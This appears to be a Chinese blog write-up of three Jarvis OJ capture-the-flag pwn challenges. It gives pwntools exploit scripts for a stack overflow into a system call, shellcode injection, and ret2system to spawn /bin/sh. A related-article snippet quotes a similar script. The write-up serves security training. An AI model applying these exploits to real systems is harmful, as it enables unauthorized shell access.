Jarvis oj level系列小记

最新推荐文章于 2022-01-22 21:49:04 发布
最新推荐文章于 2022-01-22 21:49:04 发布
阅读量255 收藏
点赞数 2
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/H_sfan/article/details/97490588
版权
本文通过三个CTF Pwn题目,详细介绍了利用栈溢出、shellcode和system函数进行攻击的方法。从level0到level2,展示了如何使用Python脚本构造payload,包括64位和32位环境下的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level0
首先我们先checksec一下level0文件,

在这里插入图片描述
可以尝试栈溢出
可以看到level0是64位文件,所以将level0拖入ida_x64,这类题简单,直接给出了system和/bin/sh

在这里插入图片描述在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述

同时,read可以读入0x200个字符,所以可以实现覆盖callsystem的地址
代码如下

from pwn import *
p = remote("pwn2.jarvisoj.com",9881) 
d = 'a'*0x80
f = 'a'*8
sys_addr = 0x0000000000400596
payload = d+ f + p64(sys_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
level1
首先checksec level1

在这里插入图片描述
发现文件是32位的,还发现了nx保护是关闭的,将文件拖入ida32

在这里插入图片描述
发现并没有system,我们点vulnerable_function函数
在这里插入图片描述

发现了一个printf函数,综合来看可以执行shellcode
代码如下

from pwn import *
shellcode = asm(shellcraft.sh())
p = remote('pwn2.jarvisoj.com', 9877)
text = p.recvline()[14: -2]
buf_addr = int(text, 16)
payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
p.send(payload)
p.interactive()

脚本执行

在这里插入图片描述
level2
第一步先checksec level2

在这里插入图片描述
level2是32位,就拖入32位ida

在这里插入图片描述
发现有system,进入字符串发现有bin/sh

在这里插入图片描述
再查看vulnerable_function函数

在这里插入图片描述
综上条件
脚本如下

from pwn import * 
p = remote('pwn2.jarvisoj.com','9878')
elf = ELF('./level2')
sh_addr = elf.search('/bin/sh').next()
system_addr = elf.symbols['system']
exit_addr = elf.symbols['read']
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(exit_addr) + p32(sh_addr)
p.send(payload)
p.interactive()

效果如下

在这里插入图片描述
暂时先写到这,细节以后有时间补,小白所做,大佬绕过,新手食用。

JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
Unity 场景资源level0 level 及sharedassets0 sharedasset1
热门推荐
kangluo1的博客
02-13 1万+
Unity出包后场景中引用的贴图 材质等,一直以来我都认为是保存在LevelI及LevelRes文件中,今天特意做了个测试,并不是这么回事。经过测试结果如下: 1.编辑器下的场景文件内容:我们以文本形式打开一个场景文件,如下: ...
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 873
level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
leveldb源码分析之sst文件格式
weixin_37871174的博客
03-02 4385
转载:http://luodw.cc/2015/10/21/leveldb-09/之前leveldb分析,讲解了leveldb两大组件memtable和log文件。这篇文章主要分析leveldb将内存数据写入磁盘文件,这些磁盘文件的格式,下一篇文章再分析源码。leveldb插入数据时,首先将数据插入memtable,当memtable数据量达到一定大小时,当前memtable赋值给immemtab...
深入理解LevelDB
varyall的专栏
05-08 2740
Compact过程:为了解决SSTable的读取速度问题。Bigtable提出了compact策略。Compact操作是将一个或多个SSTable作为输入,输出一个compact完成的SSTable。Compact操作完成这样几件事情:1.将重叠的行聚集到一张SSTable中,这样在读取一行的时候就不需要多次读取SSTable了。2. 删除过期数据(如果有设置TTL)。3. 删除标记为tombst...
LevelDB库简介
weixin_34183910的博客
10-15 2675
LevelDB库简介     一、LevelDB入门 LevelDB是Google开源的持久化KV单机数据库,具有很高的随机写,顺序读/写性能,但是随机读的性能很一般,也就是说,LevelDB很适合应用在查询较少,而写很多的场景。LevelDB应用了LSM (Log Structured Merge) 策略,lsm_tree对索引变更进行延迟及批量处理,并通过一种类似于归并排序的方式高...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
Jarvis声音.zip
09-28
这个压缩包可能包含了一系列模仿Jarvis声音的音频文件,用于个性化用户的电脑或QQ消息提示音。 首先,让我们来了解一下什么是ZIP文件。ZIP是一种常见的文件格式,用于数据压缩和归档,它可以将多个文件文件夹打包...
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 2047
攻防世界level0 将文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
Level0直接将sst文件写入到LevelN 现象 来看rocksdb对compaction的优化
天行健,地势坤
01-15 1821
通过level_compaction_dynamic_level_bytes=true 配置 来对rocksdb compaction 逻辑的优化。 现象就是L0的sst文件经过compaction直接写入到了Ln层。
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 384
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1238
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
jarvisojpwnlevel系列wp
Huiuyao的博客
12-09 2895
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 4620
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
Jarvis OJ level1
九层台
07-06 816
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
JarvisOJ level4
PLpa的博客
07-08 2402
这题与level3相比就是就是题目并没有给出对应的libc文件,这里就要学习使用一波DynELF函数了,这是pwntools的一个函数,使用前请确认安装完整pwntools工具。 前言: DynELF函数是通过已知函数,迅速查找libc库,并不需要我们自己本身知道对应版本的libc文件。 这是DynELF函数使用的一个模板: def leak(address): payload=pad+p...
基于Matlab与Yalmip的多用户储能电站日前经济调度优化模型
最新发布
04-13
内容概要:本文详细介绍了利用Matlab及其Yalmip工具箱,结合Gurobi求解器,实现多用户(如工业园区内的多个工厂)储能电站的日前经济调度优化。主要内容涵盖模型建立、变量定义、目标函数设定、约束条件配置以及求解过程。文中通过具体的代码实例展示了如何根据分时电价和各用户的用电需求,制定最优的储能充放电计划,从而达到降低总体电费的目的。此外,还讨论了一些常见的实现细节和技术难点,如充放电效率的正确处理、初始荷电状态(SOC)的设定等。 适合人群:具有一定编程基础并对电力系统优化感兴趣的工程师或研究人员。 使用场景及目标:适用于希望减少电费支出并提高能源利用效率的企业或机构。通过学习本文提供的方法,能够掌握如何构建和求解类似的优化问题,进而应用于实际工程项目中。 其他说明:文中提到的技术手段不仅限于储能调度,还可以扩展到其他类型的资源分配问题。对于想要深入了解优化理论及其工程应用的人来说,这是一个很好的入门案例。
jarvisoj_level0
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.youkuaiyun.com/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.youkuaiyun.com/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.youkuaiyun.com/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值